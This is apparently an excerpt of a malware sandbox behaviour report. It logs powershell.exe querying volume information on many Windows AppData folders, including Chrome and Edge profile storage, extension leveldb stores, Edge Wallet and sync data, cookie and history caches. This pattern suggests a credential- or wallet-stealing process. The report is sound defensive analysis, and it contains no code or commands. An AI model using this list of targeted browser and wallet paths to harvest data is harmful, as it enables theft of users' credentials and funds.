      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\History VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\de VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\en-GB VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\it VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ja VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hans VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Indexed Rules VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Content\Anonymous VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\SDX VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\input\sr-Latn-RS VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\LocalCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\TempState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\AC\INetCookies VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalCache\Roaming\Microsoft\Windows\Start Menu\Programs VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\TempState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\LocalState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\TempState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Services.Store.Engagement_8wekyb3d8bbwe\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\SystemAppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\INetCookies VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\LocalCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\LocalState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\SystemAppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\TempState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\AppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\SystemAppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\AppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\INetCookies VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\1UGQN2WC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\9IIU65Z0 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\MMOLQHS0 VolumeInformation
